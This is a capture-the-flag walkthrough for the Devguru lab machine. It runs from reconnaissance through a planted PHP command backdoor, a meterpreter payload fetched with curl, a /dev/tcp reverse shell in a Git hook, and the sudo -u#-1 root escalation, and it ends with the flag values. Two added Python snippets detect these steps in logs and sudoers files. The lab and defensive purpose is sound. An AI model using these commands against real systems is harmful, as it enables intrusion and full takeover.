DevGuru: VulnHub CTF Walkthrough

Ayush Jaiswal
9 min read · Dec 22, 2020

Today we are going to solve a CTF challenge called Devguru: 1 downloaded from Vulnhub. To do that we will be using tools such as Firefox, Wappalyzer, Nmap, Dirb, Metasploit, Git Dumper (You can clone it from here), Netcat, LinEnum Script, and some other online tools.

First, let us find the IP address of the Devguru virtual machine from our pentesting virtual machine (Kali Linux). Start both VMs with the network connection set to NAT. Once they are ready, run the following command to find the IP of the Devguru machine:

┌──(root💀kali)-[/home/kali]
└─# arp-scan --interface eth0 192.168.238.0/24

Devguru’s IPv4 address is 192.168.238.133 for me; it may be different for you, so find your own and substitute it in the commands that follow. We will visit this address and try to find out what technologies the application uses, using a browser add-on called Wappalyzer. Install the add-on in your browser and visit the application at the IP address we just found.

Wappalyzer reports that the Devguru application is built on a PHP framework (Laravel) and runs on Apache 2.4.29 on Ubuntu. All of this may come in handy later. Next, let us perform some directory busting with “dirb” using the following command:

┌──(root💀kali)-[/home/kali]
└─# dirb http://192.168.238.133 /usr/share/wordlists/dirb/big.txt

This provides a bunch of URLs which can have some juicy information. Visit all these URLs to find out what they store. We found that there is a login page of October CMS at http://192.168.238.133/backend, and at location http://192.168.238.133/.htaccess there are some juicy URLs.

This “adminer.php” is a database login page like phpMyAdmin. Now we must find credentials to log in successfully, but before that, we will perform a port scan on 192.168.238.133 using Nmap.

┌──(root💀kali)-[/home/kali]
└─# nmap -T4 -p- 192.168.238.133

The scan result tells us that only ports 22, 80 and 8585 are open. Let’s see which services are running on these ports, with version details, by running the following command:

┌──(root💀kali)-[/home/kali]
└─# nmap -A -T4 -p22,80,8585 192.168.238.133

The scan shows that a git repository (a “.git” directory) is exposed over HTTP on port 80. We are going to use a Python tool called “git-dumper” to dump this repository. Download “git-dumper” from here and change into the newly downloaded tool’s directory in the terminal. Dump the repository locally using the following command:

┌──(root💀kali)-[/home/kali/Downloads/git-dumper-master]
└─# ./git-dumper.py http://192.168.238.133/.git devguru

Run the “ls” command to confirm that a directory named “devguru” now exists with the git repository cloned into it. Looking at the directory structure of the repository we just cloned, it is clear that the project is developed with a PHP framework, as Wappalyzer already told us. So there must be a file holding the database connection details. They are stored in “devguru/config/database.php”; view the file with the “cat” command in the terminal and note down the MySQL database details.

Now we have both the “phpMyAdmin” login page at http://192.168.238.133/backend and the login credentials. Let us log in and try to find admin or user credentials from here.

There is a table in the database with the name “backend_users”, view all the entries of that table. There is only one user “frank” and the password hash for that user is also available in this table. We will use an online tool available at https://www.tunnelsup.com/hash-analyzer/ to identify the type of hash.

Since cracking a “bcrypt” hash is slow and difficult, we will instead insert into the database a new hash whose plaintext we already know. I will be using “NewPassword” with 9 rounds to generate the hash from here; you can use whatever you want. Set this new hash as the password hash of user “frank” from the phpMyAdmin page. Now visit the October CMS login page we discovered earlier at “/backend” and enter the login credentials as follows:

Username: frank

Password: NewPassword

By now we have access to the database and to the CMS account, but we still have no access to the server where the Devguru application is hosted. To get that access, we have to deliver a payload. However, from the CMS we can only store files with the extension .htm, so we cannot upload a payload yet. We have another option: inserting commands through the URL, then downloading and running the payload by visiting specific URLs. To do that we are going to edit Home from the CMS.

Under Markup tab for “home.htm” file add the following line:

{{ this.page.getShell }}

Also add the following method in the Code tab for “home.htm” file:

function onStart() {
    $this->page['getShell'] = system($_GET['cmd']);
}

Now save the file and, in a new tab, visit http://192.168.238.133/?cmd=ls -la and verify that the directory listing appears on the Devguru home page.

This verifies that we can pass commands as a URL argument. Now we will create a PHP payload on our local pentesting machine and host it with a Python web server so that the Devguru application can download it into its web root. You can get a list of payloads from here. To create the payload, run the following commands in the terminal:

┌──(root💀kali)-[/home/…/Downloads/git-dumper-master/devguru/config]
└─# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.238.131 LPORT=4444 -f raw > shell.php
└─# cat shell.php | xclip -selection clipboard && echo '<?php ' | tr -d '\n' > shell.php && xclip -selection clipboard -o >> shell.php

These commands create a PHP payload named “shell.php”. Now we launch a Python web server so that it can be downloaded onto Devguru.

┌──(root💀kali)-[/home/…/Downloads/git-dumper-master/devguru/config]
└─# python -m SimpleHTTPServer

After launching the server on the local pentesting machine, we download the file onto the Devguru application by visiting the following URL:

http://192.168.238.133/?cmd=curl 192.168.238.131:8000/shell.php >> a.php

Verify that file “a.php” is available to visit from the web application by visiting the following URL:

http://192.168.238.133/?cmd=ls -la | grep a.php

To get a meterpreter shell, we must launch a handler from the terminal via msfconsole, to do that follow the instruction given in the screenshot.

Once the handler is up and listening, visit the URL http://192.168.238.133/a.php to launch the payload. You will find a meterpreter shell waiting for you in the terminal. Type the “ls” command to verify that you have access to the Devguru site.
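From the defender’s side, every step of the web compromise above (pulling “.git”, reaching “adminer.php”, driving the “cmd” parameter, fetching a file and writing it as .php) leaves a distinctive request in the web server’s access log. The following is an added example, not code from the walkthrough or from the Devguru project: it assumes Apache’s combined log format and runs over a constructed sample modelled on the requests made in this post.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log format is assumed; the VM's own logs are not shown in the post.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample, modelled on the requests made in this walkthrough.
SAMPLE_LOG = [
    '192.168.238.131 - - [22/Dec/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 5120',
    '192.168.238.131 - - [22/Dec/2020:10:00:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23',
    '192.168.238.131 - - [22/Dec/2020:10:00:03 +0000] "GET /adminer.php HTTP/1.1" 200 4096',
    '192.168.238.131 - - [22/Dec/2020:10:00:04 +0000] "GET /?cmd=ls%20-la HTTP/1.1" 200 7000',
    '192.168.238.131 - - [22/Dec/2020:10:00:05 +0000] '
    '"GET /?cmd=curl%20192.168.238.131:8000/shell.php%20%3E%3E%20a.php HTTP/1.1" 200 5120',
    '192.168.238.131 - - [22/Dec/2020:10:00:06 +0000] "GET /a.php HTTP/1.1" 200 0',
]

def classify_request(target):
    """Return the reasons a request target looks like a step of this attack chain."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    tags = []
    if "/.git" in path:
        tags.append("git-exposure")      # source and config (incl. database.php) being pulled
    if path.endswith("/adminer.php"):
        tags.append("adminer-access")    # database admin UI reachable from the network
    query = parse_qs(parts.query, keep_blank_values=True)
    if "cmd" in query:
        tags.append("cmd-param")         # the {{ this.page.getShell }} backdoor being driven
        cmd = " ".join(query["cmd"])
        if re.search(r"\b(curl|wget)\b", cmd) and re.search(r">>?\s*\S+\.php", cmd):
            tags.append("dropper")       # fetch a remote file and write it out as .php
    return tags

def scan_access_log(lines):
    """Return (client ip, target, tags) for every line that carries at least one tag."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            tags = classify_request(m["target"])
            if tags:
                findings.append((m["ip"], m["target"], tags))
    return findings
```

Note that the final request for a.php itself looks benign; the “dropper” tag on the request just before it is the signal that a file was planted, which is why the two are worth correlating by client IP.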

Let us get a bash shell so that we can use tools like git. To do that, type “shell” in the meterpreter session and hit Enter.

Now check the git version with the command git --version to confirm that git is accessible from this shell.

Type following command to download a Linux Enumeration script developed by rebootuser and uploaded on GitHub:

git clone https://github.com/rebootuser/LinEnum.git

Wait for a few minutes so that the download gets completed and verify the same by using the “ls” command.

Go inside the directory LinEnum and type following command to run the script:

./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

When prompted for a password, just press Enter and wait a few minutes until the scan complete message appears. The script reports interesting information, including the paths of some backup files. Open them one by one to see whether they store anything juicy.

In file /var/backups/app.ini.bak we get database login credentials of “gitea” account. Gitea is an open-source forge software package for hosting software development version control using Git as well as other collaborative features like bug tracking, wikis and code review.

We already found the database login page URL through directory busting. Visit “/adminer.php” and fill in the required information; leave the DB name blank.

Username: gitea

Password: UfFPTF8C8jjxVF2m

Exploring the database, we find a table called “user” which holds the hashed password of user “frank” along with the algorithm used to hash it. Since cracking that hash is difficult, we will instead alter the table entries to insert a new password hash whose plaintext we already know.

Use the same website we used earlier to generate a new password hash with the bcrypt algorithm and 9 rounds, insert it in the field “passwd”, change “passwd_hash_algo” to bcrypt, and clear the fields “rands” and “salt”. Save it and visit http://192.168.238.133:8585 to get the Gitea login page.

Now visit the login page and log in with frank’s credentials, using the password whose hash you just calculated and inserted in the “user” table.

Voila! We have access to the git repository of user frank, but we still cannot do much from here; to reach the root directory we must perform two more steps. First we will get a reverse shell, then we will perform privilege escalation. To do that, create a new repository and name it “test”. Then go to the settings of the “test” repository and add the following line to “post-receive” under the Git Hooks tab:

/bin/bash -i >& /dev/tcp/192.168.238.131/4321 0>&1

Open a new terminal and run following command:

┌──(root💀kali)-[/home/kali]
└─# nc -nlvp 4321

This starts a Netcat listener. Leave it running and, in another terminal, clone the newly created repository. After cloning, create a new file inside the local repository and push the change to the remote repository. Use the following commands to do this:

┌──(root💀kali)-[/tmp/ayush]
└─# git clone http://192.168.238.133:8585/frank/test.git
└─# cd test
└─# touch test.txt
└─# git add .
└─# git config --global user.email "frank@devguru.local"
└─# git config --global user.name "frank"
└─# git commit -am "Test Commit"
└─# git push origin master

When prompted for a username, type “frank”, and for the password provide the password we used to log in to the Gitea portal as frank.

Once this is done, check the terminal in which the listener is running: we now have a shell as frank.

We still cannot access the “root” directory, so we have to perform privilege escalation. First check the user’s privileges with sudo -l and the installed version with sudo -V. This information tells us whether a known vulnerability or exploit is available for privilege escalation.

A quick search shows that the following command can be used to perform privilege escalation:

frank@devguru:/$ sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'

Congratulations! Now we are root, navigate to “root” directory and view the contents of root.txt file.
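The sudo -u#-1 step works only against a particular sudoers shape (a rule that grants ALL target users and relies on “!root” to exclude root) on an unpatched sudo. The following is an added example, not code from the walkthrough: it audits a sudoers file for that rule shape and checks a “sudo -V” banner against the fixed release, using a constructed sample sudoers and a simplified, assumed sudoers grammar. The fix on the defender’s side is to patch sudo and to prefer explicit allow-lists of target users over ALL with exclusions.

```python
import re

# Simplified sudoers grammar (assumed): "<user> <host>=(<runas_users>[:<runas_groups>]) [TAGS:] <commands>"
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")

# Constructed sample; the VM's real /etc/sudoers is not shown in the post.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
frank   ALL=(ALL, !root) NOPASSWD: /usr/bin/sqlite3
deploy  ALL=(www-data) /usr/bin/git
"""

def parse_runas(spec):
    """Split the user part of "(ALL, !root)" into (allowed, denied) name sets."""
    allowed, denied = set(), set()
    for item in spec.split(":")[0].split(","):
        item = item.strip()
        if item:
            (denied if item.startswith("!") else allowed).add(item.lstrip("!"))
    return allowed, denied

def risky_runas_rules(sudoers_text):
    """Rules that allow any target user and rely on '!root' (or '!#0') to keep root out.

    That deny-list shape is what `sudo -u#-1` abuses: before sudo 1.8.28 the uid -1
    (alias 4294967295) was not matched against the exclusion and the command ran as uid 0.
    """
    risky = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        allowed, denied = parse_runas(m["runas"])
        if "ALL" in allowed and denied & {"root", "#0"}:
            risky.append((m["user"], m["cmds"].strip()))
    return risky

def sudo_version_is_fixed(version_line):
    """Parse the first line of `sudo -V` (e.g. 'Sudo version 1.8.21p2') against 1.8.28."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_line)
    return m is not None and tuple(map(int, m.groups())) >= (1, 8, 28)
```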

Navigate to /home/frank to view user.txt.

Root.txt -> 96440606fb88aa7497cde5a8e68daf8f

User.txt -> 22854d0aec6ba776f9d35bf7b0e00217
